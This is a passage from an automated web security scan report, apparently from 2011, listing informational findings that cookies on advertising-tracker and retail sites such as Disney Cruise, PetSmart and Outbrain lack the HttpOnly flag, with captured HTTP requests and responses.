uid=3598886902647137246; Domain=.audienceiq.com; Expires=Sat, 12-Nov-2011 01:20:12 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.58. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/4325897289836481830 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.mediabrandsww.com
Path:	/r/dm/mkt/3/mpid//mpuid/4325897289836481830

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=2614175914018475511; Domain=.mediabrandsww.com; Expires=Sat, 12-Nov-2011 01:20:13 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.59. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.p-td.com
Path:	/r/dm/mkt/4/mpid//mpuid/4325897289836481830

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=8496530639253255806; Domain=.p-td.com; Expires=Sat, 12-Nov-2011 01:20:26 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.60. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/9/url/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.p-td.com
Path:	/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/9/url/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=8496530639253255806; Domain=.p-td.com; Expires=Sat, 12-Nov-2011 01:20:08 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.61. http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.turn.com
Path:	/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:20:13 GMT; Path=/
uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:20:13 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.62. http://data.adsrvr.org/map/cookie/contextweb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.adsrvr.org
Path:	/map/cookie/contextweb

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TDID=d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609; domain=.adsrvr.org; expires=Wed, 16-May-2012 01:26:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.63. http://disneycruise.disney.go.com/reservations/customize previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://disneycruise.disney.go.com
Path:	/reservations/customize

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

dcl_i_persistence=H+s53hrJN6y2Ah9b0W5d6AFb7O28f0XOK5Gdp5dw9D2ir0p8lxkPl7qrvYGY/z/9JOA=;expires=Mon, 16-May-2011 04:29:16 GMT;path=/;domain=disney.go.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.64. http://f.nexac.com/e/a-677/s-2140.xgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://f.nexac.com
Path:	/e/a-677/s-2140.xgi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

na_id=2011051519270862126421219180; expires=Wed, 15-May-2013 01:33:20 GMT; path=/; domain=.nexac.com
na_lr=20110515; expires=Tue, 17-May-2011 07:33:20 GMT; path=/; domain=.nexac.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /e/a-677/s-2140.xgi?na_random=516841224&na_url=http%3A//www.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static&na_referrer=http%3A//ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest%3Bsz%3D728x90%3Bclick%3Dhttp%3A//bn.xp1.ru4.com/bclick%3F_f%3D8BWls1L7DgGK%26_o%3D15607%26_eo%3D747980%26_et%3D1305508796%26_a%3D1791737%26_s%3D0%26_d%3D1125798%26_pm%3D747980%26_pn%3D17918465%26redirect%3D%3Bu%3D17918465%3Bord%3D6394684%3F&na_title=Fingerhut%3A%20Credit%20Application&na_bksite=22&na_imsite=&na_iitaxid=&na_iicatid=&na_trncnv=mRn8Y3pPWrpy_yEEPuI6T0lqo5HPo1UDDYo9y1AT4qny6bqfWdNaY8CyzUjUE-oCYu1g8PP9mqMSB6Edtps_4g&na_trntrg=&na_trncrt=&na_ev=N&na_ct=0&na_kw= HTTP/1.1
Host: f.nexac.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Set-Cookie: na_id=2011051519270862126421219180; expires=Wed, 15-May-2013 01:33:20 GMT; path=/; domain=.nexac.com
Set-Cookie: na_lr=20110515; expires=Tue, 17-May-2011 07:33:20 GMT; path=/; domain=.nexac.com
Set-Cookie: na_ps=3; expires=Wed, 15-May-2013 01:33:20 GMT; path=/; domain=.nexac.com
X-Powered-By: Jigawatts
Content-type: text/html
Date: Mon, 16 May 2011 01:33:20 GMT
Server: lighttpd/1.4.18
Content-Length: 382

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
</head>
<body>

<iframe name="__bknsframe" src="http://tags.bluekai.com/psite/1846?partner=1&ret=h
...[SNIP]...

16.65. http://gannett.gcion.com/addyn/3.0/5111.1/809051/0/-1/ADTECH previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gannett.gcion.com
Path:	/addyn/3.0/5111.1/809051/0/-1/ADTECH

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JEB2=4DD077236E651A440C6EAF39F0005EB9;expires=Wed, 15 May 2013 1:19:45 GMT;domain=gannett.gcion.com;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /addyn/3.0/5111.1/809051/0/-1/ADTECH;size=728x90;alias=www.usatoday.com/travel/cruises_Top728x90;cookie=info;loc=100;target=_blank;key=cw27+cw369+cw368+cw356+cw371+cw370;kvcw=27:369:368:356:371:370;grp=227269;misc=1305508785597 HTTP/1.1
Host: gannett.gcion.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

16.66. http://https.edge.ru4.com/smartserve/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://https.edge.ru4.com
Path:	/smartserve/ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ru4.1320=1#2656#0#2656=ad-2656-004|3|1305509917569%7C2656%7Cpt-2656-001%7Cpl-2656-104%7Cad-2656-004%7C%2B-%7Coff%7C%2B-%7Ccontrol%7C%2B-%7Cnone%7Ccontrol%7C2915161843%7Cpt-2656-001%2526%25255E%25255E%25255E%2526homepage%2526%2526%2526%25255E%25255E%25255E%2526%25255E%2526%2526173.193.214.243%2526%2526%2526%2526%2526%2526|%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-|1305509917#; Domain=.edge.ru4.com; Expires=Fri, 15-Jul-2011 01:38:37 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.67. http://i.w55c.net/ping_match.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.w55c.net
Path:	/ping_match.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

wfivefivec=ea5c094a-3a81-4d54-b8e2-975f65fd39a9;Path=/;Domain=.w55c.net;Expires=Wed, 15-May-13 01:19:51 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.68. http://idcs.interclick.com/Segment.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sgm=9622=734271; domain=.interclick.com; expires=Sat, 15-May-2021 20:32:16 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.69. http://idpix.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idpix.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

clid=2ll77mm01171voofy6a0tk1w02dey0043r030l03504; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:20:08 GMT; Path=/
orblb=2ll8nk2011y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:20:08 GMT; Path=/
rdrlst=4030d6hll8nk2000000033r0301hvll8nk2000000033r0301g3ll8nk2000000033r03; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:20:08 GMT; Path=/
sglst=2010s1jzll8nk200xhi0033r030l03503; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:20:08 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w02dey0043r030l03504; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:20:08 GMT; Path=/
Set-Cookie: orblb=2ll8nk2011y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:20:08 GMT; Path=/
Set-Cookie: rdrlst=4030d6hll8nk2000000033r0301hvll8nk2000000033r0301g3ll8nk2000000033r03; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:20:08 GMT; Path=/
Set-Cookie: sglst=2010s1jzll8nk200xhi0033r030l03503; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:20:08 GMT; Path=/
Set-Cookie: vstcnt=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 16 May 2011 01:20:07 GMT

GIF89a.............!.......,...........D..;

16.70. http://image2.pubmatic.com/AdServer/Pug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/AdServer/Pug

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

KRTBCOOKIE_58=1344-AG-00000001389358554; domain=pubmatic.com; expires=Sun, 14-Aug-2011 01:19:52 GMT; path=/
PUBRETARGET=445_1313284792; domain=pubmatic.com; expires=Sun, 14-Aug-2011 01:19:52 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.71. http://includes.petsmart.com/homepage/redesigned/images/logo-facebook.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://includes.petsmart.com
Path:	/homepage/redesigned/images/logo-facebook.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARPT=JOLQUPS172.16.96.229CKMYY; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /homepage/redesigned/images/logo-facebook.gif HTTP/1.1
Host: includes.petsmart.com
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=JOLQUPS172.16.96.229CKMYY; path=/
Date: Mon, 16 May 2011 01:39:25 GMT
Server: Apache
Last-Modified: Fri, 27 Mar 2009 22:11:50 GMT
ETag: "86c00f-78-4662104f59580"
Accept-Ranges: bytes
Content-Length: 120
Content-Type: image/gif

GIF89a.......;Y....m.....ay.Eb.`x....!.......,..........=x.....I.$.j...A0u......\....."@R...o..>..XQ.... .,..I&.y..(...;

16.72. http://includes.petsmart.com/homepage/redesigned/images/logo-twitter.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://includes.petsmart.com
Path:	/homepage/redesigned/images/logo-twitter.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARPT=JOLQUPS172.16.96.229CKMYY; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /homepage/redesigned/images/logo-twitter.gif HTTP/1.1
Host: includes.petsmart.com
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=JOLQUPS172.16.96.229CKMYY; path=/
Date: Mon, 16 May 2011 01:39:24 GMT
Server: Apache
Last-Modified: Fri, 27 Mar 2009 22:02:41 GMT
ETag: "86c00e-175-46620e43c8240"
Accept-Ranges: bytes
Content-Length: 373
Content-Type: image/gif

GIF89a.....$..........|........d..t.......................<.....l........$....................T........D..L...........\.................................................................................
...[SNIP]...

16.73. http://js.revsci.net/gateway/gw.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

udm_0=MLvv9S8JaSpnph4dB7K/U2jMXE9l9UPv4cAxSFUju2SKUz95WBnMIjc0Jq4KGB9vOb2p7tsHUn0i4kv3IuuN09LTaoxzFIqHdDdOfDkiI3Q5SzKPuSl0/IBAUNz2Q+yb+sUOsJ6tk9CZlnWX9ofHJRQpixo+R7Jj8KTzm2j7rf1VPj+gUeVQubgOH4XSap+Qg7KPXbqwUJo/+ER9xQrBcVgFRdC3IDw40FQMJvqXOdGrUvDs2Iipiq7YjYZ56PtJJuvrAisvufRRN3jjCjUgAN6XG3lhXhgLfbMM4U4EYo8/xtXBTuqdNoJOieZ4DCsKHO68uU/euXERtDCaHNg4xypbadOuFs2iQ7aZn0Zw/YiglpUWbhpM9Se8rt2PFznhtpHIwb+pCAyvv8bBI7//FYyrld4XnLPA5Dpv+FBsnPMvRe3VBHeTdEOP/9bPUYskLTQMzosNs1A7v+FuDPjgcRzMjTu5ZC9P39i2E6Vh8eZTU4GFpOvGxMh+BfAkTrdQj+LYpPes8NM15/9dkUHovMxq9zuthZhsKtzNKhVXxJOJ/U1ZJ2FABNgGZyv6PuOkAN8PMLA+2RNiu0BuRlzu2pc20wnXGbPZ1P215dIyLzffMP8tUAq2HKFNoSxxR0BhUurZQhJdcYGcDMXbHRwrBeLs/wSev3A4Rr7LW2ynoMvfRe5xd9OMb1cdENK/H+zq6gnaAW26KbYR2sOUuqn+b4H29p3USZXhoI5xVPIG9K982gWOhYW/Os9PCMvjPYfKkqEw4pXSuMmXkMQ3RXp9fcPdDizaKVnLwM6v2chYpYu0gJG66oxzEdPSAEZANDz7bYa88srJlE8fEYCV9vJQE5dv4cgl8M9QoOqlwiV1WMetlzANuR8TZRnUC1d3oIkujdICfZleM0O0FSiThWA9X5ObvBCKElJImKHmbBpjZdsM1Ufn0stWyVeWwdqPG4bj4iil0FNQXNlyTzS4eEefCQ2uWzlsElVopKY1U3v1N1zYT2bhIP+fd3zR750=; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:25:49 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.74. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

C2=jCI0NFJwHsb0FpfqHjQCiZ4Si+CCeziRblK8IYsYGAH; domain=advertising.com; expires=Wed, 15-May-2013 01:40:51 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.75. http://media.fastclick.net/w/tre previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/tre

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lyc=BAAAAARD0s9NACAAAFlgBYAABIsyAABJoBcBFEyAE0AABmNWAACRgNBgKQEfTkARgAAB5jOAB2AAAFBgBWAAA+o2AAA=; domain=.fastclick.net; path=/; expires=Wed, 15-May-2013 01:40:52 GMT
pluto=660455823372; domain=.fastclick.net; path=/; expires=Wed, 15-May-2013 01:40:52 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.76. http://odb.outbrain.com/utils/get previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://odb.outbrain.com
Path:	/utils/get

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

obuid=8212382c-a920-4555-8b81-259021933018; Domain=.outbrain.com; Expires=Thu, 10-May-2012 01:20:01 GMT; Path=/
tick=1305508801726; Domain=.outbrain.com; Path=/
_lvs2="uaMqgoSgWEtsUDbY+ohiLdTBMiCQRzqSyDZn+kvSOpk="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 11-Jun-2012 01:20:01 GMT; Path=/
_lvd2="e0MjrHqXH8wCQxDytJnB4N69GWfDw5tMPzeXAm/v95E+Pd3eRDQ31LtR9rpG/iasrRB7gaZuTZkaOZp2Wa/Mig=="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Sun, 22-May-2011 14:08:01 GMT; Path=/
_rcc2=NXlRX9sMiunRtm+CPv1EhOsE3s6itk45; Domain=outbrain.com; Expires=Mon, 11-Jun-2012 01:20:01 GMT; Path=/
recs-d05ceaa5e98919d54bf25e1e7852b87a="C8l7XAqvsWXXoYiuQVgi+fUpe6TWk1Kf7lTKiLbsbR6vpF6c0L+pYTIIxYz9qEDsFRTizFCiaiU="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Mon, 16-May-2011 01:25:01 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.77. http://odb.outbrain.com/utils/ping.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://odb.outbrain.com
Path:	/utils/ping.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

obuid=8212382c-a920-4555-8b81-259021933018; Domain=.outbrain.com; Expires=Thu, 10-May-2012 01:19:52 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.78. http://optimized-by.rubiconproject.com/a/dk.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/dk.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=4462/5032; expires=Mon, 16-May-2011 02:21:49 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses2=5032^1; expires=Tue, 17-May-2011 04:59:59 GMT; max-age=110290; path=/; domain=.rubiconproject.com
csi2=3179363.js^2^1305508799^1305508909&3158416.js^1^1305508790^1305508790; expires=Mon, 23-May-2011 01:21:49 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/dk.js?defaulting_ad=x303190.js&size_id=2&account_id=4462&site_id=5032&size=728x90 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; ruid=154dd07bb6adc1d6f31bfa10^1^1305508790^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=4462/5032; rdk2=0; ses2=5032^1; csi2=3158416.js^1^1305508790^1305508790; rpb=5671%3D1; put_2081=AG-00000001389358554

Response

16.79. http://p.brilig.com/contact/bct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://p.brilig.com
Path:	/contact/bct

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BriligContact=98af0ff8-2b65-4314-a162-44d6c9442b5e; Domain=.brilig.com; Expires=Wed, 08-May-2041 01:24:05 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.80. http://pix04.revsci.net/D08734/a1/0/0/0.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPNe0PF7gMQFmJWbyWFI8KcVrpFPspBkQQl039IaIgg8jZQUo0NbqPPGqKijctoWezVxn8NETHRFNNSzdtFRTUCxWfOKMPVZklOsdH4xajO0s37Wwz/7kTD5ULyoHR4m1zbPl+patzVgK0FRKgg8HIekkYS5L2I9ZH9bQpQfBRVPCosmpYT5EbkzhtnV4qjes0+4V4NQlyRHu8HPhpHXMFc; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:27:06 GMT; Path=/
udm_0=MLv39S8JaSpnph4dB7K/G387JUZpTEF7bBfSBcrl4GZ0DuhdE65A9sjL/vODgau+0ez8vR6ZC1nYzPH4IuuN87FZ4WADz+pq1jvL/iNwgLtlNdjleIfLlz0uEZFfSGaEiK+yWYqPAI3xPY1uWQyCA8HO5oBfT30Lca4W4Lz2IcT5Ryk7tW3MU7q3BYih9BMfkZY/6UittEWmFvtHcssd3m0LRFbH8mcpL9RBMBDplDbavE/sv9kJnudEbZhTcq91aPAMhFt54xJUPjTnF6k0MOyiFr1ibikt83cQalIquHcItkkZ5aCAHnuetAGRPOpgO76UnAD0S659WopGn066WHpk72h7oMq6AmWpMR3z5qwEhj9T6nXRtA1SggSqhXq0gcMamUPHFisp0pbeG/HXU1HQkKw1yo+TiKXn8QcttAzFcz0uGjvk0uM7UBfJmj4bfKTmussOlg8u95mG8LCWRDXtStrhxeDzv2KFF32aZldKfGhJCxN7lCO4bEYK1/WL9pUxuhZip7o1iAS+chtkBps0ZaVPltSIb+WsuId9aj4ahoRj/kNu8kK6R6rkP0NjpXPOO2D5DAy9LhB7aLirkhyc2NspTH4HY6aEVE+KJ3hlC+XlM60txn5QP314Jiimpn/JHqxtXWUZiKCwjmqReXsBDQFqtIQgp3vWy7kwENCeIqKB5SuKChT9O60e1D4UUUO6GhWolLOLniWBD9Gb3WtSjLqSOeC4tQIXZvg81T5OTy/a2g2Drr5acyHI4DKMA5+mA6OGxf3ugpnfInlTfnjM1hkxxnoY3Nfv+Q4aDPx3nYu6BeGbbs2HkwxRBXMp7GmTgNvJyptECIq8O1q97TBoBG3y2QzlmVCsTrlIJTpK1ajlMl9bCQJMDH4OW3M8ASzAwFB5zlxhQacEAQaunpkAFBuJHWJPmCRFVL4POVoOERKGu6Wwj92IvL4uFcfCp7CAkVDhcgQUu5vHyQOeQAYatElgayLnMXY7hsfZOHg4DNpo1/Lu4w==; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:27:06 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.81. http://pix04.revsci.net/E06560/b3/0/3/0902121/179920729.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/E06560/b3/0/3/0902121/179920729.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPNfcPG7gMUFVJGSXAru+PspYp8Zh1vxU4kHQpvTJd5E38Uby8gAQtSL0j8UFK4h8IFpXuZrLSfteXArmPZg/O+tDYVt4DWBmlQuQeNBWHL0M3bZxr/7kbDaukbHXsevvyz0uHQn4wL4sXXo9zC07YrXswS3ctuzx/w1oQEEUBiG7Fkd+08Z0a0Aq8+neXrJjEYTyoXD7O/9BSRxw==; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:24:04 GMT; Path=/
rtc_kCmS=MLsvrdMvcT5jJQFErn5VSDYGHlHr5G4IUDwGBCOQN50vl8AxTgkQ69k2sWbYhD5swupGFuttZZ30pjREZ/ZkKkhmVOC4XP9dHEpHAm3ADaku92HBduCPjDheEZyi3USKjMyJU8PKvSGf6dbgKbkkF1T9nPoTyICKBODL5dWNTWGJSo//SZoNqh0jXWrCVj5fE0hG1/Ew1855Q3kGOJISwLZwyFyrdDpPp9pEr5K7YRGtS1DhqDKb+B3xI4h5pUmK196H1VYARyez77DbY8fCN3YqmgkgAm74R4TtPLq8byYJ7dh3Jpzg7zgqcfYD+8HJFFf4m0VurVwRBH7s; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:24:04 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.82. http://pix04.revsci.net/E06560/b3/0/3/0902121/480772802.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/E06560/b3/0/3/0902121/480772802.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPNfkPF7gMQFmJWL5j/WBXspbqHMesZyDAPtJdoj9JykQ4ej5YiARKcvgOUaU7WmpZ+xn8NESHRFNNSzd1GRfHGtEbUp0AXZklOsdH4xbjJ0s37Wwz/7kTDdI8G8cutk1H7VJNJsHaPA/N8TPyic0kdBJO4QAB0haFFqoQVy5YUeyCAV3xISpG+5m6Vkmmgxmt5q0OaCcFKWkm3; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:33:41 GMT; Path=/
rtc_2CEm=MLuBq44HAVpDE1RBdcKR9wRKtq+wIgaJBK6wovjkPUHnRwu1INU7YESuLkV5mBhoj5Zf1jVUOEA+YtTPI8JufG9qk+49XXbra2qlylkpqQO52MR8g/svwiZ/saCvRqEgZsRMRhxaFgNrFkokeURuaSlOMqC2ElhxVA7leaNnGoNkf6JjSJknQc1oDhVGXzxjcD95Kk8prg37AEdom8BXLQ==; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:33:41 GMT; Path=/

